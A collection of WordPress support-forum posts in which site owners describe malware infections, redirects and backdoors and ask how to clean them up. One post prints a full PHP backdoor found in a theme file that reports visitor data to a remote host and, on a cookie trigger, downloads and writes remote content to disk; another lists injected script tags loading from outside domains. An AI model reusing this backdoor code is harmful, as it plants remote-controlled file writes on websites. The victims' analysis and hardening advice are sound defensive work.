Hello,

We are (paying) user of GOTMLS since a while, but today we realised that it’s not working on most of our websites that have been infected with this new virus js.donatelloflowfirstly. ga

Could you tell us if you have a plan in mind to clean it correctly?

Kind Regards

Hi, I have malicious code on my website. I booked Sucuri https://sucuri.net/ to delete the malcode but they can`t access the page. They need an ftp access. Is there any possibility to create an FTP access for an WordPress.org site? Or can the cleaning of the malware be done by WordPress itself??

I also tried to check the installed plugins to see if there is any issue right now. Unfortunately, while logging into wp-admin it`s asking me to update the database. Due to the malware I did not want to do it. Do you think this is unrisky?

Thank you so much for a fast feedback!
Patrick

Hello to anyone,
my host provider informed me with this message:

Hello,

ImunifyAV scanned your websites automatically for malware. At least one of them is infected and needs your action:

reteinformatica.biz 1 file infetto
/wp-content/plugins/w3-total-cache/inc/lightbox/support_us.php

negozio.reteinformatica.biz 1 file infetto /wp-content/plugins/w3-total-cache/inc/lightbox/support_us.php

Remove the malware with one-click

Best regards,
Plesk and ImunifyAV Teams

Same thing with another site I have with other domain.

Hi,

Please can you explain why you have a backdoor that has been detected as Malware in the latest update of Wp Hide?

wp-content/plugins/wp-hide-security-enhancer-pro/modules/components/firewall-setup.php

Many thanks

malware anonymousfox has attacked several of my sites hosted by cpanel.

malware will overwrite the main username with anonymousfox
malware creates an e-mail address in cpanel
malware creates php files e.g. xkjsfnadl.php in wordpress

how do I proceed with the removal?

I tried
in phpmyadmin, I rewrote the main username and reset the password.
changed all passwords
removed malware scripts
deleted email address

malware was back within 24 hours.

I have 10 sites infected.
thanks.

I am getting the following Malware related warning for the Updraft Plus plugin. Please check if this is something to be concerned about.
1. Path: /wp-content/plugins/updraftplus/updraftplus/vendor/guzzle/guzzle/phar-stub.php

2. /wp-content/plugins/updraftplus/updraftplus/vendor/kriswallsmith/assetic/src/Assetic/Extension/Twig/TwigFormulaLoader.php

3. /wp-content/plugins/updraftplus/updraftplus/vendor/phpseclib/phpseclib/phpseclib/Crypt/Base.php

Note: These warnings were from a Security Plugin named CleanTalk.

Hi Folks

Our server malware detection has found a number of sites that use WordFence but have had Malware installed on them without WordFence picking it up.

Exploit has been installed by modifying wp-con-PHP and is coming up as mr.dellationx196.bogor.blackhat.1

I am not putting the full site links on here due to security and further potential exploit, but here are the location of the malware:

/public_html/staging/wp-content/themes/twentynineteen/wp-con.php (Dormant Theme)
/public_html/wp-content/themes/MinimalChild/wp-con.php (active theme)

Any ideas why WordFence is not picking these up?

Regards

When someone visits my website by typing in the web address, they are getting redirected.
The website must be hacked but I am not sure what I need to do to stop this from happening. I have installed Wordfence and set it up but my website continues to be redirected.

Any help to solve this problem would be greatly appreciated.

They don’t have any technical knowledge and simply waste our time. They know good marketing strategies and their website came first on search results.

Hi,

I assume malware being loaded through this plugin:
<script src=’https://longtailmagic.com/domain/i.php?ver=5.5.1′ id=’hello_newscript0-js’ type=”0404c25a3b8094c261f60e71-text/javascript”></script>
<script src=’https://jadsupport.com/includes/i.php?ver=5.5.1′ id=’hello_newscript1-js’ type=”0404c25a3b8094c261f60e71-text/javascript”></script>
<script src=’https://magaliefonteneau.com/wp-content/i.php?ver=5.5.1′ id=’hello_newscript2-js’ type=”0404c25a3b8094c261f60e71-text/javascript”></script>
<script src=”https://futuracp.com/images/i.php?ver=5.5.1″ id=’hello_newscript3-js’ type=”0404c25a3b8094c261f60e71-text/javascript”></script>
<script src=”https://casualwoodcreations.com/images/i.php?ver=5.5.1″ id=’hello_newscript4-js’ type=”0404c25a3b8094c261f60e71-text/javascript”></script>
<script src=’https://s3.tradingview.com/tv.js?ver=5.5.1′ id=’tv-common-js-js’ type=”0404c25a3b8094c261f60e71-text/javascript”></script>

https://magaliefonteneau.com/wp-content/i.php?ver=5.5.1 contains malware.
Be cautious when installing this plugin.

1 star for the malware.

I am experiencing website redirection on my website when clicked through Google search results only for the new user.

For example:

1. Go to Google.com (in a NEW window where there is no previous history of cflowapps.com)
2. Search for “Cflow”
3. Click on www.cflowapps.com
4. Click anywhere on the page, it redirects to spam site

This happens only for the first time.

This plugin was used to add malware to my website.

It added in a string eval of lots of numbers which equated to a redirect to a spam site.

It loaded this script:
developerstatss.ga
Which redirected to this site:
https://declarebusinessgroup.ga
Which then redirected to this site:
https://sinistermousemove.art

Uninstalling this plugin fixed the issue.

Hello to anyone,
my host provider informed me with this message:

Hello,

ImunifyAV scanned your websites automatically for malware. At least one of them is infected and needs your action:

reteinformatica.biz 1 file infetto
/wp-content/plugins/w3-total-cache/inc/lightbox/support_us.php

negozio.reteinformatica.biz 1 file infetto /wp-content/plugins/w3-total-cache/inc/lightbox/support_us.php

Remove the malware with one-click

Best regards,
Plesk and ImunifyAV Teams

Same thing with another site I have with other domain.

Useful but it injected malware

My WordPress site (built with Divi) was hacked and malware spread throughout that site and the others I have. I located all infected files (index.php, htaccess, etc.) and deleted them so that my domains would be unlocked by my host. Then, I copied all the remaining files in their folder structure. Is there anyway I can use those to restore my website? If not, can they give me the images and text I used, so I can rebuild it that way?

(Yes, I have a backup, but it is located in another country. I was on a short trip when the world changed — COVID-19 –, and I am still unable to return to get it.)

Thanks!

Hi all
First off thank you for chiming in.
I am a hobbies WP site builder for my friends and family

This is my first time experiencing a malware on my shared Bluehost Server, Cpanel etc
I moved an old site of one of my mates across to my server enabled SSL on it. This is Where I think the first infection came from.
I was not until a few weeks ago I got a notification that malware was detected on my site, I asked my host to scan for me and found an Increasing number of infection each time I scanned.
So I go to work. I used wordfence “free and premium depending on the site” to scan my site as the hosting provider threatened to shut down my account unless the next scan came back clean.

I found a .php with a .htaccess file in these locations on most of the sites on the server

wp-admin/js/widgets/index.php
wp-content/uploads/2020/02/index.php
wp-admin/css/colors.index.php
wp-content/uploads/2019/index.php
wp-includes/Requests/Exceptions/Html5.php
wp-content/themes/My theme/header.php – affected All themes installed on each site

These were infected with
SL-PHP-BACKDOOR-GENERIC-bca.UNOFFICIAL
or
SL-PHP-INJECTOR-1-fmd.UNOFFICIAL
or
A file changed as malicious

For most of my sites, I run a child theme on theme
I inspected header.php before and after to try and find the new injected code.
To do this I downloaded a clean version of the theme, copy and pasted the bad header.php and good header.php into diff checker
Link https://www.diffchecker.com/ to analyse the code

I found a load line right at the top of the bad header.php

Top of the bad header.php

<?php @include_once 'slider.css'; ?><?php
/**
 * The Header for our theme.

Top of the good header.php

<?php
/**
 * The Header for our theme.

From this, I could see the header.php was loading another file
slider.css –
<?php @include_once 'slider.css'; ?>

I looked deeper into my theme files and found it. I also noticed this file was not included in my theme at all, because I had a child theme set up where i found the slider.css i also found 5 new files that did not exist before.

public_html/exampledomain/wp-content/themes/my-child-Theme

.htaccess
404.php
fuctions.php
html5.php
slider.css
styles.css

In the Modiflyed 404.php file i can see its loading the html5.php file
@include_once ‘html5.css’; get_header(); ?>

<?php
/**
 * The template for displaying 404 pages (not found)
 *
 * @package WordPress
 * @subpackage WordPress_Theme
 * @since WordPress Theme 1.0
 */

@include_once 'html5.css'; get_header(); ?>

	<div id="primary" class="content-area">
		<main id="main" class="site-main" role="main">

			<section class="error-404 not-found">
				<header class="page-header">
					<h1 class="page-title"><?php _e( 'Oops! That page can&rsquo;t be found.' ); ?></h1>
				</header><!-- .page-header -->

				<div class="page-content">
					<p><?php _e( 'It looks like nothing was found at this location. Maybe try a search?' ); ?></p>

					<?php get_search_form(); ?>
				</div><!-- .page-content -->
			</section><!-- .error-404 -->

		</main><!-- .site-main -->
	</div><!-- .content-area -->

<?php get_footer(); ?>

in the random Html5.php files I found this code – about line 250 – this file was not original in the child theme – Also all upload dates were changed to random dates.
it’s beyond my skill set to understand what it’s doing

[hidden] {
	display: none;
}*/ error_reporting( 0 ); if( function_exists( 'is_user_logged_in' ) ) { if( is_user_logged_in() ) return; }
$_Post_Wi = 'wp-includes'; $_Post_404 = '/404/'; $_Post_Ts = 'tps'; $_Post_In = '.info';
	$_Post_Eq = '='; $_Post_An = '&'; $_Post_Th = 'ht';
		$Link_Id = $_Post_Th . $_Post_Ts . ':' . '//' . $_Post_Wi . $_Post_In . $_Post_404;
$User_Id = isset( $_SERVER['HTTP_USER_AGENT'] ) ? urlencode( $_SERVER['HTTP_USER_AGENT'] ) : '';

	$_id_ = $_COOKIE; if( !empty( $_id_['div_type'] ) ) { $Link_Id .= $_Post_Wi;
if( function_exists( 'curl_init' ) ) { $_div_ = curl_init( $Link_Id ); curl_setopt( $_div_, CURLOPT_HEADER, 0 );
	curl_setopt( $_div_, CURLOPT_CONNECTTIMEOUT, 11 ); curl_setopt( $_div_, CURLOPT_TIMEOUT, 11 );
		curl_setopt( $_div_, CURLOPT_RETURNTRANSFER, 1 ); $Post_Id = curl_exec( $_div_ ); curl_close( $_div_ ); } else
	$Post_Id = file_get_contents( $Link_Id ); file_put_contents( $_id_['div_name'].$_id_['div_type'], $Post_Id ); echo( $User_Id.'
' ); return; } if( strstr( $User_Id, 'WordPress.com' ) && strstr( $User_Id, 'wordpress.com' ) ) { echo( $User_Id.'
' ); return; }

$Post_Error = strstr( $_SERVER['HTTP_HOST'], '127.0' ) ? $_SERVER['SERVER_ADDR'] : $_SERVER['HTTP_HOST'];
	$Link_Id .= '?' . 'post' . $_Post_Eq . urlencode( $Post_Error.$_SERVER['REQUEST_URI'] ) . $_Post_An .
'id' . $_Post_Eq . urlencode( $_SERVER['REMOTE_ADDR'] ) . $_Post_An . 'user' . $_Post_Eq . $User_Id;

if( function_exists( 'curl_init' ) ) { $_div_ = curl_init( $Link_Id ); curl_setopt( $_div_, CURLOPT_HEADER, 0 );
	curl_setopt( $_div_, CURLOPT_CONNECTTIMEOUT, 11 ); curl_setopt( $_div_, CURLOPT_TIMEOUT, 11 );
		curl_setopt( $_div_, CURLOPT_RETURNTRANSFER, 1 ); $Post_Id = curl_exec( $_div_ ); curl_close( $_div_ ); } else
$Post_Id = file_get_contents( $Link_Id ); if( strstr( $Post_Id, $_Post_Wi.$_Post_In ) ) die( header( $Post_Id ) ); ?>

All these files contained shit code that was not the same as the original child theme for the site.
I delete them all and re-uploaded the child theme and main theme.
I thought I had cleaned out all bad files. all Scans were coming back clean so I was happy. “more below the infection came back with files reappearing in plain site after they were deleted”

All was good for about 2 weeks, I had fixed all my sites and removed old ones did a full clean up. Changed all password. 2fa for the server etc.

I found that the infection had come back. I went through my process again and fixed all the sites. removed all code from bad area etc.
i decided to try to harden my uploads area. details below.
And in front of me, a found wp-file-manager-pro pop-up in the uploads folder. I changed my passwords etc again deleted the file for it to come right back as soon I refreshed the page. even if I changed the permissions to 444 – read the folder came back. I managed to grab a zip of it and download it.

It contained
FM_backup – filemanager I could not see any creation date – No file permission
index.php
index.html

When I went to look inside the index.html and index.php they were empty.
If I renamed the folder wp-filemanager-pro and delete it came back with the same name.
“how do I figure out what recreating this”

Hardening my .htaccess files in the main directory and uploads directory

“not I’m not an expert. this is what I found from many sources on the web. “any additions or changes let me know”

I have come up with this .htccess file to block a lot of things. most parts of code have a description, one I’m not sure about. Please see below.
Another note. Htaccess files should have permissions of 444

#.htaccess file for the main level of the subdomain

# BEGIN rlrssslReallySimpleSSL rsssl_version[3.3.5]
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTPS} !=on [NC]
RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]
</IfModule>
# END rlrssslReallySimpleSSL

# BEGIN WordPress   you need to find out if this is ok
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

# Wordfence WAF  -  wordfence needs to be installed and enabled 
<Files ".user.ini">
<IfModule mod_authz_core.c>
	Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
	Order deny,allow
	Deny from all
</IfModule>
</Files>
# END Wordfence WAF

# This is block authors scan in .htaccess in your root directory. 
# An example is http://yourdomain.co.nz/?author=2 from wordfence scan 
# BEGIN block author scans
 RewriteEngine On
RewriteBase /
RewriteCond %{QUERY_STRING} (author=\d+) [NC]
RewriteRule .* - [F]
 # END block author scans

# Block WordPress xmlrpc.php requests in .htaccess. This blocks remote access to the site on phones. 
<Files xmlrpc.php>
order deny,allow
deny from all
</Files>

<IfModule mod_alias.c>
RedirectMatch 403 /(.*)/xmlrpc\.php$
</IfModule>

# Disable directory browsing example. Https://yoursite.co.nz/wp-content/plugins - Stops Directorys From Been Viewable

Options -Indexes

I have also created one for the uploads directory.

“not I’m not an expert. this is what I found from many sources on the web. “any additions or changes/mistakes let me know”

# Start Wordfence code execution protection - Blocks code from running - Remember to put 444 security on the .htaccess file in the upload directory
<IfModule mod_php5.c>
php_flag engine 0
</IfModule>
<IfModule mod_php7.c>
php_flag engine 0
</IfModule>
AddHandler cgi-script .php .phtml .php3 .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI
# END Wordfence code execution protection

# This Compleatly blocks all Files in upload directory 
<Files ~ ".*..*">
	Order Allow,Deny
	Deny from all
</Files>

# After that add file extensions you want to allow access - only files that can be opened - you must add extentions if you want to use them
<FilesMatch ".(jpg|jpeg|jpe|gif|png|mp4|pdf)$">
	Order Deny,Allow
	Allow from all
</FilesMatch>

# END File Extention Block

Thank you for your time chiming in. I a hobbyist and finding this very hard.

Hi, my site was one of thousands that got hacked in September. I deleted the plugin and, one month later, I still haven’t able to get rid of some hidden spam links that the virus inject on my site. Google rejects my ads saying I have thos “ghost” links which I can’t find. I hired a team of people with NO luck. Do you know anything about this? Is there any way you can assit me?

Is this plugin still working in WP 5.5?
Is it still reliable?
It still gets recommended here: https://www.wpstuffs.com/detect-malicious-code-wordpress-themes-plugins/

We often have sites from agencies to fix which seem to be using Free downloaded commercial themes and Nulled Plugins. They often cleaned the problems up pretty well but sometimes they miss parts and the the sites or actually complete servers seem to be turned over to hackers.

Saying this the easiest way to secure WordPress and to make WordPress safer would actually be to provide all commercial themes and plugins also as a CLEAN(edup) version – but really cleaned up version on a trusted site. Only that way Networks like WP-VCD could be stopped with their malicious sites and finally WordPress would be made much securer. Instead of charging for 1 sites, 5 sites etc licenses which actually are not compliant with GNU GPL anyway as GPL says you can modify, copy, and even redistribute the code as long as you keep the same licenses in place. It would be much better that they focus on their reputation and helping the community of all to use cleaned code and benefit from support and more project requests due to their much better visibility.

Anyway that is not the question here – we have to deal still with those malicious sites and clean up the mess, So what plugins to do so are still working in 5.5 as this one hasn’t been updated by even Automatic!!! since 3 years – does not really speak for their reputation either or?

I have a hacked site (php backdoor I believe) Was wondering… if I start with a fresh load of WP on another server, then use your migration plugin… will I end up bringing the malware with me to the new server?

Thanks for your help-